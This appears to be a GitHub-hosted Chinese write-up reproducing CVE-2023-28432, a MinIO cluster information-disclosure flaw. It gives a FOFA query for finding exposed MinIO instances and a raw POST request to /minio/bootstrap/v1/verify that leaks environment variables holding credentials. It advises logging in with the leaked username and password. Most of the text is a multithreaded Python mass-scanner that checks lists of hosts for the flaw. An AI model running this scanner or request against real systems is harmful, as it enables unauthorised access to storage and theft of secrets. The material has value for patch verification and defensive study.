forked from thatformat/Hvv2023
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2023-28432 MinIO集群模式信息泄露漏洞复现.txt
136 lines (109 loc) · 4.92 KB
/
CVE-2023-28432 MinIO集群模式信息泄露漏洞复现.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
来自公众号: 小白嘿课
搜索公众号可查阅详情 有截图复现过程
本文链接:https://mp.weixin.qq.com/s/SXAEQ3WSOSo_sqGTXN7S6Q
0x01 漏洞概述
漏洞编号:CVE-2023-28432 CNNVD-202303-1795
MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息。泄露的信息中包含登录账号密码。
MinIO 存在信息泄露漏洞,该漏洞源于在集群部署中MinIO会返回所有环境变量,导致信息泄露。
0x02 影响版本
2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
0x03 漏洞复现
方式一:可以通过FOFA进行搜索,搜索的语法格式如下:
title="MinIO Browser"
漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,通过BP抓包分析。
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: 192.168.126.128:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
(data数据为空 详情复现截图可查看原文链接)
利用泄露的用户名和密码登录系统。
# -*- coding: utf-8 -*-
from urllib.parse import urlsplit
import argparse
import requests
import sys
import re
import threading
from requests.exceptions import RequestException
from urllib3.exceptions import InsecureRequestWarning
# 自定义请求头字段
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
}
vulurl=[]
#url合规检测执行
def urltest(url):
parsed_url = urlsplit(url)
if parsed_url.port == "443" and parsed_url.netloc:
url="https://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
vultest(url)
if parsed_url.netloc and parsed_url.path:
url=parsed_url.scheme+"://"+parsed_url.netloc+"/minio/bootstrap/v1/verify"
vultest(url)
elif parsed_url.netloc:
url=url+"/minio/bootstrap/v1/verify"
vultest(url)
elif (not parsed_url.scheme) and parsed_url.path:
url_1="http://"+url+"/minio/bootstrap/v1/verify"
vultest(url_1)
url_2="https://"+url+"/minio/bootstrap/v1/verify"
vultest(url_2)
else:
modified_string = re.sub(r"[/\\].*", "/minio/bootstrap/v1/verify", url)
url_1="http://"+modified_string
vultest(url_1)
url_2="https://"+modified_string
vultest(url_2)
#漏洞检测
def vultest(url):
try:
response = requests.post(url, data=data, headers=headers, verify=False , timeout=3)
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
# 检查响应头的状态码是否为200
if response.status_code == 200 and ("MinioEnv" in response.text):
vulurl.append(url)
print(url+" [+]漏洞存在!!!")
else:
print(url+" [-]漏洞不存在。")
except RequestException:
parsed_url = urlsplit(url)
url=parsed_url.scheme+"://"+parsed_url.netloc
print(url+" [-]请求失败。")
#读取url或file
def main():
# 禁用警告
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser(description="读取命令行参数")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-u', '--url', help='URL 参数')
group.add_argument('-f', '--file', help='file 参数')
args = parser.parse_args()
if args.url:
urltest(args.url)
elif args.file:
threads_queue=[]
with open(args.file, 'r') as file:
for line in file:
line=line.strip()
read_thread = threading.Thread(target=urltest, args=(line,))
threads_queue.append(read_thread)
read_thread.start()
for thread in threads_queue:
thread.join()
print("\n存在漏洞列表:")
for url in vulurl:
print(url+" [+]漏洞存在!!!")
if __name__ == "__main__":
main()